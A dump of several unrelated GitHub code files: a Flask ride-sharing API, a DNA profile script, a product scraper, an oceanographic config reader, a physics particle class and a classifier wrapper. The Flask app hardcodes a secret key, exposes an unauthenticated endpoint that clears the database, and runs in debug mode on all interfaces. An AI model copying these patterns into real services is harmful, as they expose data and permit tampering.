content.decode(\"utf-8\", errors=\"replace\")\n with open(file_name, \"ab\") as f:\n print >> f, content.encode(\"utf-8\", errors=\"replace\")\n return HttpResponse(content)\n","repo_name":"cl-ei/madliar.com","sub_path":"application/recored.py","file_name":"recored.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"41377130687","text":"#!/usr/bin/env python\nimport os\nfrom flask import Flask, request, jsonify, make_response\nfrom flask import render_template, redirect, url_for, abort\nfrom flask_sqlalchemy import SQLAlchemy\nimport uuid\nfrom werkzeug.security import generate_password_hash, check_password_hash\nimport datetime\nfrom functools import wraps\nfrom sqlalchemy import Column, Integer, DateTime\nimport re\nimport requests\nimport json\nimport pandas as pd\nimport flask\n#count of read requests\ndic ={\"count\" :0}\nwith open('count.json', 'w') as json_file:\n json.dump(dic, json_file)\nip_addr=\"http://3.220.27.213\"\ndf=pd.read_csv(\"locdb.csv\")\nd=dict(zip(df['Area No'],df['Area Name']))\napp = Flask(__name__)\nbasedir = os.path.abspath(os.path.dirname(__file__))\nres=app.test_client()\napp.config['SECRET_KEY'] = 'thisissecret'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'tutorial.db')\ndb = SQLAlchemy(app)\nheaders={\"Content-Type\":\"application/json\"}\nclass MyDateTime(db.TypeDecorator):\n\timpl = db.DateTime\n\tdef 
process_bind_param(self, value, dialect):\n\t\tif type(value) is str:\n\t\t\treturn datetime.datetime.strptime(value, '%d-%m-%Y:%S-%M-%H')\n\t\treturn value\n\n#CREATING USER\nclass User(db.Model):\n\tid = db.Column(db.Integer, primary_key=True)\n\tname = db.Column(db.String(50))\n\tpassword = db.Column(db.String(80))\n\n#CREATING RIDER\nclass Rider(db.Model):\n\tid = db.Column(db.Integer, primary_key=True)\n\tcreated_by = db.Column(db.String(50))\n\ttimestamp = db.Column(MyDateTime, default=datetime.datetime.now)\n\tsource = db.Column(db.Integer)\n\tdestination = db.Column(db.Integer)\n\nclass Shared(db.Model):\n\tid = db.Column(db.Integer, primary_key=True)\n\tride_id = db.Column(db.Integer)\n\tshared_by = db.Column(db.String(50))\n\n\n#API:3\n@app.route('/api/v1/rides', methods=['POST'])\ndef create_rider():\n\tdata = request.get_json(force=True)\n\tdf=list()\n\tmessage = requests.get(\"http://USERandRide-254276649.us-east-1.elb.amazonaws.com/api/v1/users\",headers={\"Origin\":\"3.220.27.213\"})\n\t#return message.text\n\tfor x in message.text[1:-1].split(', '):\n\t\tdf.append(x[1:-1])\n\t#return str(df[1])\n\tif request.method == 'POST':\n\t\tif data['created_by'] in df:\n\t\t\trequests.post(ip_addr+\"/api/v1/db/write\", json ={\"api\":\"3\",\"created_by\":data['created_by'], \"timestamp\":data['timestamp'], \"source\":data['source'], \"destination\":data['destination']},headers=headers)\n\t\t\tstatus_code = flask.Response(status=201)\n\t\t\treturn status_code\n\t\telse:\n\t\t\tabort(400)\n\telse:\n\t\tabort(405)\n\n#API:4\n@app.route('/api/v1/rides', methods=['GET'])\ndef upcoming_rides():\n\twith app.test_client() as client:\n\t\tresponse = client.get('/')\n\t\tif response.status_code==405:\n\t\t\tabort(str(response.status_code))\n\tsource=int(request.args.get('source'))\n\tdestination=int(request.args.get('destination'))\n\tif(source<1 and source>198 and destination<1 and destination>198 ):\n\t\tabort(400)\t\n\tread_data = requests.post(ip_addr+\"/api/v1/db/read\",json={\"api\":\"4\"})\n\tread_data = read_data.json()\n\t# return jsonify(read_data)\n\tupcoming = []\n\tcurrent_time = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\tcurrent_time = datetime.datetime.now().strptime(current_time,\"%Y-%m-%d %H:%M:%S\")\n\tfor i in range(len(read_data[\"created_by\"])):\n\t\ttime1 = datetime.datetime.strptime(read_data['timestamp'][i],\"%a, %d %b %Y %H:%M:%S %Z\" )\n\t\tif(source == read_data['source'][i] and destination == read_data['destination'][i] and time1>current_time):\n\t\t\ttime1 = datetime.datetime.strptime(read_data['timestamp'][i],\"%a, %d %b %Y %H:%M:%S %Z\" )\n\t\t\ttime =datetime.datetime.strftime(time1,\"%d-%m-%Y:%S-%M-%H\")\n\t\t\tupcoming.append({\"rideId\":read_data['rideId'][i],\"username\":read_data['created_by'][i],\"timestamp\":time})\n\tif(len(upcoming)!=0):\n\t\treturn jsonify(upcoming)\t\n\telif(len(upcoming)==0):\n\t\tstatus_code = flask.Response(status=204)\n\t\treturn status_code\n\telse:\n\t\tabort(400)\n\n\n#API:5,6,7\n@app.route('/api/v1/rides/',methods=['GET','DELETE','POST'])\ndef list_ride(ride_id):\n\tif request.method == 'GET':\n\t\tif db.session.query(Rider).filter_by(id=ride_id).count():\n\t\t\tr=requests.post(ip_addr+\"/api/v1/db/read\", json ={\"api\":\"5\",\"ride_id\":ride_id},headers=headers)\n\t\t\treturn r.json()\n\t\telse:\n\t\t\tstatus_code = flask.Response(status=204)\n\t\t\treturn status_code\n\telif request.method == 'POST':\n\t\tdf=list()\n\t\tmessage = 
requests.get(\"http://USERandRide-254276649.us-east-1.elb.amazonaws.com/api/v1/users\",headers={\"Origin\":\"3.220.27.213\"})\n\t\t#return message.text\n\t\tfor x in message.text[1:-1].split(', '):\n\t\t\tdf.append(x[1:-1])\n\t\t#return str(df)\n\t\t#return request.get_json(force=True)['username']\n\t\tif db.session.query(Rider).filter_by(id=ride_id).count() and request.get_json(force=True)['username'] in df:\n\t\t\trequests.post(ip_addr+\"/api/v1/db/write\", json ={\"api\":\"6\",\"ride_id\":ride_id,\"shared_by\":request.get_json(force=True)['username']},headers=headers)\n\t\t\tstatus_code = flask.Response(status=201)\n\t\t\treturn status_code\n\t\telse:\n\t\t\tabort(400)\n\telif request.method == 'DELETE':\n\t\tif db.session.query(Rider).filter_by(id=ride_id).count():\n\t\t\trequests.post(ip_addr+\"/api/v1/db/write\",json={\"api\":\"7\",\"ride_id\":ride_id})\n\t\t\tstatus_code = flask.Response(status=200)\n\t\t\treturn status_code\n\t\telse:\n\t\t\tstatus_code = flask.Response(status=204)\n\t\t\treturn status_code\n\telse:\n\t\tabort(405)\n\n#API:8\n@app.route('/api/v1/db/write', methods=['POST'])\ndef write_db():\n\tdata = request.get_json(force=True)\n\tif(data['api']==\"3\"):\n\t\tnew_rider= Rider( created_by=data['created_by'], timestamp=data['timestamp'], source=data['source'], destination=data['destination'])\n\t\tdb.session.add(new_rider)\n\t\tdb.session.commit()\n\tif(data['api']==\"6\"):\n\t\tnew_shared = Shared(ride_id=data['ride_id'],shared_by=data['shared_by'])\n\t\tdb.session.add(new_shared)\n\t\tdb.session.commit()\n\tif(data['api']==\"7\"):\n\t\trider_delete= db.session.query(Rider).filter_by(id=data['ride_id']).one()\n\t\tdb.session.delete(rider_delete)\n\t\tdb.session.commit()\n\twith open(\"count.json\", \"r\") as jsonFile:\n\t\tdata = json.load(jsonFile)\n\tdata[\"count\"] =data[\"count\"]+1\n\twith open(\"count.json\", \"w\") as jsonFile:\n\t\tjson.dump(data, jsonFile)\n\n\n@app.route('/api/v1/db/clear',methods=['POST'])\ndef clear_db():\n\tmeta = db.metadata\n\tfor table in reversed(meta.sorted_tables):\n\t\tdb.session.execute(table.delete())\n\tdb.session.commit()\n\tstatus_code = flask.Response(status=200)\n\twith open(\"count.json\", \"r\") as jsonFile:\n\t\tdata = json.load(jsonFile)\n\tdata[\"count\"] =data[\"count\"]+1\n\twith open(\"count.json\", \"w\") as jsonFile:\n\t\tjson.dump(data, jsonFile)\n\treturn status_code\n\n@app.route('/api/v1/db/read', methods=['POST'])\ndef read_db():\n\tdata = request.get_json(force=True)\n\tif(data['api']==\"4\"):\n\t\tread_data = db.session.query(Rider).all()\n\t\tride_data = dict()\n\t\tride_data['rideId'] = []\n\t\tride_data['created_by'] = []\n\t\tride_data['timestamp'] = []\n\t\tride_data['source'] = []\n\t\tride_data['destination'] = []\n\t\tfor ride in read_data:\n\t\t\tride_data['rideId'].append(ride.id)\n\t\t\tride_data['created_by'].append(ride.created_by)\n\t\t\tride_data['timestamp'].append(ride.timestamp)\n\t\t\tride_data['source'].append(ride.source)\n\t\t\tride_data['destination'].append(ride.destination)\n\t\treturn ride_data\n\tif(data['api']==\"5\"):\n\t\tride = db.session.query(Rider).filter_by(id=data['ride_id']).one()\n\t\tshared = db.session.query(Shared).filter_by(ride_id=data['ride_id']).all()\n\t\tl=[]\n\t\tfor share in shared:\n\t\t\tl.append(share.shared_by)\n\t\treturn jsonify(ride_Id=ride.id,Created_by=ride.created_by,users=l,Timestamp=ride.timestamp,source=d[ride.source],destination=d[ride.destination])\n\twith open(\"count.json\", \"r\") as jsonFile:\n\t\tdata = 
json.load(jsonFile)\n\tdata[\"count\"] =data[\"count\"]+1\n\twith open(\"count.json\", \"w\") as jsonFile:\n\t\tjson.dump(data, jsonFile)\n\n@app.route('/api/v1/_count',methods=['GET'])\ndef count():\n\twith open(\"count.json\", \"r\") as jsonFile:\n\t\tdata = json.load(jsonFile)\n\treturn jsonify(data[\"count\"])\n\n@app.route('/api/v1/_count',methods=['DELETE'])\ndef reset_count():\n\twith open(\"count.json\", \"r\") as jsonFile:\n\t\tdata = json.load(jsonFile)\n\tdata[\"count\"] =0\n\twith open(\"count.json\", \"w\") as jsonFile:\n\t\tjson.dump(data, jsonFile)\n\tstatus_code = flask.Response(status=201)\n\treturn status_code\n\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0',port=80,debug=True)\n","repo_name":"adivar99/CloudComputingProject","sub_path":"Assignment 3/Ride/rides.py","file_name":"rides.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"73073243841","text":"import random \n\ndef hamming(seq1, seq2):\n    distance = 0\n    for nuc in range(len(seq1)):\n        if seq1[nuc] != seq2[nuc]:\n            distance += 1\n    return distance\n\ndef profile_matrix(dna):\n    seq_num = float(len(dna))\n    nucs = ['A', 'C', 'G', 'T']\n    profile_matrix = []\n    for i in range(len(dna[0])):\n        base_indeces = [seq[i] for seq in dna]\n        profile_values = [float(base_indeces.count(nuc))/seq_num for nuc in nucs]\n        profile_matrix.append(profile_values)\n    return [list(i) for i in zip(*profile_matrix)]\n#sanitycheck = print(profile_matrix(dna = \"AAAATTTTTGGGGCCCCACTAGACTGGTTAGGAGCGCGTATGC\"))\ndef get_profile_dict(prof_matrix, pos):\n    profile_dict = {'A': prof_matrix[0][pos], 'C': prof_matrix[1][pos], 'G': prof_matrix[2][pos], 'T': prof_matrix[3][pos]}\n    return profile_dict\n\ndef find_probable_kmer(seq, k, prof_matrix):\n    max_prob = 0 \n    prob_list = [] \n    for subset_pos in range(len(seq) - k+1):\n        kmer_prob = 1 \n        substring = seq[subset_pos:subset_pos+k]\n        for pos in range(len(substring)):\n            profile = get_profile_dict(prof_matrix, pos)\n            kmer_prob *= profile[substring[pos]]\n        prob_list.append(kmer_prob)\n    subset_pos = prob_list.index(max(prob_list))\n    max_prob_kmer = seq[subset_pos:subset_pos + k]\n    return max_prob_kmer\nsanitycheck = print(find_probable_kmer(seq = 'AAGGCCTATGATGATGATGATGATAGGTAGACGATCGATATAGCGATCGGGATCGGATCGGATCGGATCGAGATTAGGCTAGGCTAAAGTCTCCTAGTAAAGAGACTAGTAGATGATGATGATGATGCTGCGCGCGCGCGTGCTGCTGAGCAACGATTAGGCCG', k = 3, prof_matrix = profile_matrix('AAGGCCTATGATGATGATGATGATAGGTAGACGATCGATATAGCGATCGGGATCGGATCGGATCGGATCGAGATTAGGCTAGGCTAAAGTCTCCTAGTAAAGAGACTAGTAGATGATGATGATGATGCTGCGCGCGCGCGTGCTGCTGAGCAACGATTAGGCCG')))","repo_name":"tevinflom/bioinformatics_toolkit","sub_path":"toolkit/hiddenmessages_dna/sussy.py","file_name":"sussy.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"41758650697","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nbaseurl = 'https://www.bol.com/'\n\n\nheaders = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'\n}\n\nproductlinks = []\n\nfor x in range(1,109):\n    r = requests.get(f'https://www.bol.com/nl/s/?searchtext=beard+balm&searchContext=media_all&appliedSearchContextId=&suggestFragment=&adjustedSection=&originalSection=&originalSearchContext=&section=main&N=0&defaultSearchContext=media_all&page={x}')\n    soup = BeautifulSoup(r.content, 'lxml')\n    productlist = soup.find_all('div', class_='product-item__info hit-area')\n    for item in productlist:\n        for link in item.find_all('a', href=True):\n            productlinks.append(baseurl + link['href'])\n\nprint(len(productlinks))\n#print(productlinks)\n\ntestlink = 'https://www.bol.com/nl/s/?searchtext=beard+balm&searchContext=media_all&appliedSearchContextId=&suggestFragment=&adjustedSection=&originalSection=&originalSearchContext=&section=main&N=0&defaultSearchContext=media_all'\nr = requests.get(testlink, headers=headers)\nsoup = BeautifulSoup(r.content, 'lxml')\nname=soup.find('h1', class_='page-heading')\nrating=soup.find('div', class_='rating-horizontal__average-score')\nprice = soup.find('section', class_='price-block price-block--large')\nprint(name,price, rating)\n","repo_name":"harshakantipudi/class","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"23987526230","text":"#\r\n# File: m_init_reader.py\r\n#\r\n# Created: October 4th, 2021\r\n#\r\n# Author: Fernando Mendonça (fmmendonca@ualg.pt)\r\n#\r\n# Purpose: Read and check inputs from SMS-Coastal initialization file.\r\n#          Save inputs in a binary pickle file.\r\n#\r\n\r\nimport json\r\nimport pickle\r\nfrom os import getcwd, path\r\nfrom time import time\r\nfrom datetime import datetime, timedelta\r\n\r\n\r\nclass Reader:\r\n    def __init__(self):\r\n        \"\"\"Class to read and check the inputs from the SMS-Coastal\r\n        initialization file (init.json).\r\n        \"\"\"\r\n\r\n        # Set attributes:\r\n        self.forc = {}\r\n        self.sim = {}\r\n        self.datm = {}\r\n        self.public = {\r\n            \"root\": getcwd(),\r\n            \"base\": path.basename(getcwd()),\r\n            \"timer\": time()\r\n        }\r\n\r\n        # Read json file:\r\n        self.inpts = json.load(open(\"init.json\", \"rb\"))\r\n        self.inpts: dict\r\n    \r\n    def rdpublic(self) -> int:\r\n        \"\"\"Check the inputs inside 'public' section of SMS-Coastal\r\n        initialization file. 
Return a status code.\r\n        \"\"\"\r\n        \r\n        print(\"Check inputs from 'public' section of 'init.json'.\")\r\n        inpts = self.inpts.get(\"public\")\r\n\r\n        # Check operation type:\r\n        key = \"optype\"\r\n        val = inpts.get(key)\r\n        vals = (\"forc\", \"sim\", \"simr\", \"data\")\r\n        \r\n        if not val:\r\n            print(\"ERROR: operation type is not defined.\")\r\n            return 1\r\n        elif not isinstance(val, str) or val.lower() not in vals:\r\n            print(\"ERROR: invalid operation type.\")\r\n            return 1\r\n        \r\n        self.public.update({key: val.lower()})\r\n        \r\n        # Check operation date:\r\n        key = \"opdate\"\r\n        val = inpts.get(key)\r\n        \r\n        if not val:\r\n            val = datetime.today().strftime(\"%Y %m %d\")\r\n        elif not isinstance(val, str):\r\n            print(\"ERROR: invalid type of operation date.\")\r\n            return 1\r\n        \r\n        try:\r\n            val = datetime.strptime(val, \"%Y %m %d\")\r\n        except ValueError:\r\n            print(\"ERROR: invalid format of operation date.\")\r\n            return 1\r\n        \r\n        if val.date() > datetime.today().date():\r\n            print(\"ERROR: operation date can't be greater than today.\")\r\n            return 1\r\n        \r\n        self.public.update({key: val})\r\n\r\n        # Get email addresses for report:\r\n        key = \"email\"\r\n        vals = inpts.get(key)\r\n        if not vals: vals = []\r\n\r\n        if not isinstance(vals, list):\r\n            print(\"ERROR: invalid type of 'email'.\")\r\n            return 1\r\n\r\n        for val in vals:\r\n            if isinstance(val, str): continue\r\n            print(\"ERROR: invalid type in 'email'.\")\r\n            return 1\r\n        self.public.update({key: vals})\r\n\r\n        # Check forecast range:\r\n        key = \"forecast\"\r\n        val = inpts.get(key)\r\n        if val is None: val = 0\r\n        \r\n        if not isinstance(val, int) or val < 0:\r\n            print(\"ERROR: invalid forecast range value.\")\r\n            return 1\r\n        \r\n        self.public.update({key: val})\r\n\r\n        # Check restart ranges:\r\n        key = \"restart\"\r\n        vals = inpts.get(key)\r\n        if not vals: vals = [0,]\r\n\r\n        if not isinstance(vals, list):\r\n            print(\"ERROR: invalid type of 'restart'.\")\r\n            return 1\r\n        \r\n        for val in vals:\r\n            if isinstance(val, int) and val >= 0: continue\r\n            print(\"ERROR: invalid type in 'restart'.\")\r\n            return 1\r\n        \r\n        self.public.update({key: vals})\r\n\r\n        # Check model number of levels.\r\n        # Same as 'forecast' but different error message:\r\n        key = \"levels\"\r\n        val = inpts.get(key)\r\n        if val is None: val = 0\r\n\r\n        if not isinstance(val, int) or val < 0:\r\n            print(\"ERROR: invalid number of model levels.\")\r\n            return 1\r\n        \r\n        self.public.update({key: val})\r\n\r\n        # Check type of the model in 'modtype':\r\n        key = \"modtype\"\r\n        val = inpts.get(key)\r\n        \r\n        if not val:\r\n            val = \"1\"\r\n        elif val not in (\"1\", \"2\"):\r\n            print(\"ERROR: invalid type of model.\")\r\n            return 1\r\n        \r\n        self.public.update({key: val})\r\n\r\n        # Check restart operation in 'rstday':\r\n        vals = (\"mon\", \"tue\", \"wed\", \"thu\", \"fri\", \"sat\", \"sun\")\r\n        val = inpts.get(\"rstday\")\r\n        \r\n        if self.public.get(\"optype\") == \"simr\":\r\n            val = self.public.get(\"opdate\").strftime(\"%a\").lower()\r\n            # This way rston will always be True.\r\n        elif not val:\r\n            val = self.public.get(\"opdate\") - timedelta(1)\r\n            val = val.strftime(\"%a\").lower()\r\n            # rston will always be False.\r\n\r\n        if val not in vals:\r\n            print(\"ERROR: invalid value of restart day.\")\r\n            return 1\r\n\r\n        # Define restart switch:\r\n        if self.public.get(\"opdate\").strftime(\"%a\").lower() == val:\r\n            val = True\r\n        else:\r\n            val = False\r\n        \r\n        self.sim.update({\"rston\": val})\r\n        return 0\r\n\r\n    def svpkl(self) -> None:\r\n        \"\"\"Save class dictionary attributes in a binary 
pickle file.\"\"\"\r\n \r\n data = {\r\n \"public\": self.public, \"forc\": self.forc,\r\n \"sim\": self.sim, \"data\": self.datm,\r\n }\r\n pickle.dump(data, open(\"init.pkl\", \"wb\"))\r\n\r\n def rdforc(self) -> int:\r\n \"\"\"Check the inputs inside 'forc' section of SMS-Coastal\r\n initialization file. Return a status code.\r\n \"\"\"\r\n\r\n print(\"Check inputs from 'forc' section of 'init.json'.\")\r\n # SMS-coastal sources library:\r\n lib = {\r\n \"MERCATOR\": {\"fctrg\": 9, \"iniat\": 12},\r\n \"MERCATORH\": {\"fctrg\": 8, \"iniat\": 23.5},\r\n \"AMSEAS\": {\"fctrg\": 3, \"iniat\": 0}, \r\n \"SKIRON\": {\"fctrg\": 7, \"iniat\": 0},\r\n \"NAM\": {\"fctrg\": 2, \"iniat\": 0},\r\n \"GFS\": {\"fctrg\": 14, \"iniat\": 1},\r\n }\r\n # Forecast range ('fctrg') is the x of D+x.\r\n # if x = 2 -> D+2 -> run for 3 days.\r\n\r\n # Check sources:\r\n forc = self.inpts.get(\"forc\", {})\r\n srcs = forc.get(\"sources\")\r\n if not srcs: srcs = {}\r\n\r\n if not srcs:\r\n print(\"WARNING: no data source defined.\")\r\n self.sim.update({\"skip\": True})\r\n return 0\r\n \r\n # Check each source:\r\n srcsout = {}\r\n\r\n for key in srcs:\r\n # Error if source is not in SMS-Coastal library:\r\n if key.upper() not in lib.keys():\r\n print(\r\n f\"ERROR: '{key}' is not available in the library.\",\r\n )\r\n return 1\r\n\r\n # Check parameters:\r\n src = cksrc(key, srcs.get(key))\r\n if not src: return 1\r\n \r\n # Update sources output:\r\n srcsout.update({key.upper(): src})\r\n \r\n # Update forc attribute:\r\n self.forc.update({\"sources\": srcsout})\r\n\r\n # Check grid limits in 'latlim' and 'lonlim':\r\n grid = []\r\n keys = (\"latlim\", \"lonlim\")\r\n for key in keys:\r\n vals = forc.pop(key, None)\r\n if vals is None or not isinstance(vals, list):\r\n print(f\"ERROR: invalid type of '{key}'.\")\r\n return 1\r\n elif len(vals) != 2:\r\n print(f\"ERROR: invalid shape of '{key}'.\")\r\n return 1 \r\n # Check each value:\r\n for val in vals:\r\n if isinstance(val, (int, float)): continue\r\n print(f\"ERROR: invalid type in '{key}'.\")\r\n return 1\r\n # Update grid:\r\n vals.sort()\r\n grid += vals\r\n self.forc.update({\"grid\": grid})\r\n\r\n # Check switch to skip Forcing Layer at Simulation one:\r\n val = forc.pop(\"skip\", False)\r\n if val not in (True, False): val = False\r\n self.sim.update({\"skip\": val})\r\n\r\n # Sort sources by download start time:\r\n val = {}\r\n for srcid in srcsout:\r\n val.update({srcid: srcsout.get(srcid).get(\"start\")})\r\n val = list(dict(sorted(val.items(), key=lambda src: src[1])).keys())\r\n # val.items gives a list of tuples [(key1, val1), (key2, val2)]\r\n # and src in lambda function is each of that pairs.\r\n # so src[1] is to sort by the second position of the pairs.\r\n \r\n # Update attributes:\r\n self.forc.update({\"order\": val})\r\n self.sim.update({\"sources\": val})\r\n\r\n # Check data initial time and difference in forecast range\r\n # for Simulation Manager.\r\n # Get the latest time between sources:\r\n iniat = []\r\n fctrg = []\r\n fctdt = 0\r\n\r\n for srcid in srcsout:\r\n iniat.append(lib.get(srcid).get(\"iniat\"))\r\n fctrg.append(lib.get(srcid).get(\"fctrg\"))\r\n\r\n iniat.sort(reverse=True)\r\n if iniat.count(iniat[0]) != len(iniat):\r\n # Sources begin at different time, lose one forecast day:\r\n fctdt += -1\r\n iniat = iniat[0]\r\n\r\n # Get the lowest forecast range between sources:\r\n fctrg.sort()\r\n fctrg = fctrg[0]\r\n\r\n # Compare with public section:\r\n fct = self.public.get(\"forecast\")\r\n opdate = 
self.public.get(\"opdate\") + timedelta(hours=iniat)\r\n\r\n        # Check forecast range:\r\n        if fct > fctrg:\r\n            fct = fctrg\r\n            print(f\"WARNING: forecast range updated to {fct} day(s).\")\r\n        if fctdt < 0:\r\n            fct += fctdt\r\n            print(\r\n                \"WARNING: data sources initial time don't match.\",\r\n                f\"Forecast range updated to {fct} day(s).\",\r\n            )\r\n        self.public.update({\"opdate\": opdate, \"forecast\": fct})\r\n\r\n        # Build dates:\r\n        rst = 0\r\n        for val in self.public.get(\"restart\"): rst += val\r\n        self.forc.update({\r\n            \"ini\": (opdate - timedelta(rst)).date(),\r\n            \"fin\": (opdate + timedelta(fct)).date(),\r\n        })\r\n\r\n        return 0\r\n\r\n    def rdsim(self) -> int:\r\n        return 0\r\n\r\n    def rddatm(self) -> int:\r\n        return 0\r\n\r\n\r\ndef cksrc(srcid: str, params: dict) -> dict:\r\n    \"\"\"Check the parameters of only one source.\r\n    \r\n    Keyword arguments:\r\n    srcid -- name of the input source;\r\n    params -- parameters of a source.\r\n    \"\"\"\r\n\r\n    # Extract parameters:\r\n    start = 0 if not params.get(\"start\") else params.get(\"start\")\r\n    swtch_old = [\r\n        params.pop(\"tohdf\", False), params.pop(\"tomodel\", False),\r\n        params.pop(\"tots\", False), params.pop(\"merge\", False),\r\n    ]\r\n    swtch_new = []\r\n    batims = [] if not params.get(\"batims\") else params.get(\"batims\")\r\n    geomt = \"\" if not params.get(\"geomt\") else params.get(\"geomt\")\r\n    tsloc = [0, 0] if not params.get(\"tsloc\") else params.get(\"tsloc\")\r\n    special = [] if not params.get(\"special\") else params.get(\"special\")\r\n    cred = [\"u\", \"p\"] if not params.get(\"cred\") else params.get(\"cred\")\r\n\r\n    #\r\n    # Check start:\r\n    if not isinstance(start, (int, float)):\r\n        print(f\"ERROR: invalid type of 'start' for '{srcid}'.\")\r\n        return {}\r\n    if not 0 <= start < 24:\r\n        print(f\"ERROR: 'start' is out of range for '{srcid}'.\")\r\n        return {}\r\n\r\n    #\r\n    # Check boolean parameters:\r\n    for param in swtch_old:\r\n        val = param\r\n        if val not in (True, False): val = False\r\n        swtch_new.append(val)\r\n    \r\n    # 'merge' is True if any other switch is True:\r\n    if True in swtch_new[:-1]: swtch_new[-1] = True\r\n\r\n    # Check bathymetry and geometry file paths.\r\n    # Check instances:\r\n    if not isinstance(batims, list) or not isinstance(geomt, str):\r\n        print(\r\n            f\"ERROR: invalid type of 'batims' or 'geomt' for '{srcid}'.\",\r\n        )\r\n        return {}\r\n\r\n    for val in batims:\r\n        if isinstance(val, str): continue\r\n        print(f\"ERROR: invalid type in 'batims' for '{srcid}'.\")\r\n        return {}\r\n    \r\n    # Check if they are mandatory and values:\r\n    if True in swtch_new[:2]:\r\n        if not batims:\r\n            print(\r\n                f\"ERROR: missing values in 'batims' for '{srcid}'.\",\r\n            )\r\n            return {}\r\n        for val in batims:\r\n            if path.isfile(val): continue\r\n            print(\r\n                f\"ERROR: bathymetry file not found for '{srcid}'.\",\r\n            )\r\n            return {}\r\n\r\n    if swtch_new[1] and not path.isfile(geomt):\r\n        print(f\"ERROR: geometry file not found for '{srcid}'.\")\r\n        return {}\r\n\r\n    # Check tsloc:\r\n    if not isinstance(tsloc, list) or len(tsloc) != 2:\r\n        print(\r\n            f\"ERROR: invalid type/shape of 'tsloc' for '{srcid}'.\",\r\n        )\r\n        return {}\r\n    for val in tsloc:\r\n        if isinstance(val, int): continue\r\n        print(f\"ERROR: invalid type in 'tsloc' for '{srcid}'.\")\r\n        return {}\r\n\r\n    #\r\n    # Check special operations:\r\n    if not isinstance(special, list):\r\n        print(f\"ERROR: invalid type of 'special' for '{srcid}'.\")\r\n        return {}\r\n    for val in special:\r\n        if isinstance(val, str): continue\r\n        print(f\"ERROR: invalid type in 'special' for 
'{srcid}'.\")\r\n        return {}\r\n\r\n    #\r\n    # Check download credentials:\r\n    if not isinstance(cred, list) or len(cred) != 2:\r\n        print(f\"ERROR: invalid type/shape of 'cred' for '{srcid}'.\")\r\n        return {}\r\n    for val in cred:\r\n        if isinstance(val, str): continue\r\n        print(f\"ERROR: invalid type in 'cred' for '{srcid}'.\")\r\n        return {}\r\n\r\n    return {\r\n        \"start\": start,\r\n        \"tohdf\": swtch_new[0], \"tomodel\": swtch_new[1],\r\n        \"tots\": swtch_new[2], \"merge\": swtch_new[3],\r\n        \"batims\": batims, \"geomt\": geomt, \"tsloc\": tsloc,\r\n        \"special\": special, \"cred\": cred,\r\n    }\r\n","repo_name":"fmmendonca/SMS-Coastal","sub_path":"Dev/m_init_reader.py","file_name":"m_init_reader.py","file_ext":"py","file_size_in_byte":13888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"27230111409","text":"import numpy as np\r\nimport math\r\nimport copy\r\nimport scipy.constants\r\nfrom Particle import Particle\r\n\r\nclass Chargedparticle(Particle):\r\n\r\n    eCharge=scipy.constants.e\r\n    \r\n    def __init__(self, Position=np.array([0,0,0], dtype=float),\r\n                 Velocity=np.array([0,0,0], dtype=float),\r\n                 Acceleration=np.array([0,0,0], dtype=float),\r\n                 Name='Ball',\r\n                 Mass=scipy.constants.m_p,\r\n                 Charge=eCharge):\r\n        super().__init__(Position=Position, Velocity=Velocity, Acceleration=Acceleration, Name=Name, Mass=Mass)\r\n        self.Charge=Charge\r\n\r\n    def __repr__(self):\r\n        return 'Charged Particle: {0}, Mass: {1:12.3e}, Charge:{2:12.3e}, Position: {3}, Velocity: {4}, Acceleration: {5}'.format(self.Name, self.mass,self.Charge,self.position,self.velocity,self.acceleration)\r\n\r\nclass Proton(Chargedparticle):\r\n\r\n    def __init__(self, Position=np.array([0,0,0], dtype=float),\r\n                 Velocity=np.array([0,1000,0], dtype=float),\r\n                 Acceleration=np.array([0,0,0], dtype=float),\r\n                 Name='Proton'):\r\n        Mass=scipy.constants.m_p\r\n        Charge = scipy.constants.e\r\n        super().__init__(Position=Position, Velocity=Velocity, Acceleration=Acceleration, Name=Name, Mass=Mass,Charge=Charge)","repo_name":"Lancaster-Physics-Phys389-2020/phys389-2020-project-Jack-Fannon","sub_path":"Chargedparticle.py","file_name":"Chargedparticle.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"5495422485","text":"from sklearn import svm, neighbors, tree\r\n\r\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis, LinearDiscriminantAnalysis\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom IPython.display import Image\r\nimport pydotplus\r\n\r\nimport main\r\n\r\nclass Classifiers:\r\n\r\n    classifier_names = [\"\", \"LDA\", \"SVM\", \"SGD\", \"KN\", \"DT\", \"RF\", \"MLP\", \"QDA\"]\r\n\r\n    def __init__(self):\r\n        pass\r\n\r\n    # it returns y_predict\r\n    def run_classifier(self, x_train, y_train, x_test, classifier=1):\r\n        s = Classifiers\r\n        #y_pred = []\r\n        if classifier==1:\r\n            #print(\"LDA\")\r\n            return s.LDA_classifier(self, x_train, y_train, x_test, solver=\"lsqr\", shrinkage=0.5, store_covariance=True)\r\n        elif classifier == 2:\r\n            #print(\"SVM\")\r\n            return s.SVM_classifier(self, x_train, y_train, x_test)\r\n        elif classifier == 3:\r\n            #print(\"SGD\")\r\n            return s.sgd_classifier(self, x_train, y_train, x_test, loss=\"hinge\", penalty=\"l2\")\r\n        elif classifier == 4:\r\n            #print(\"KN\")\r\n   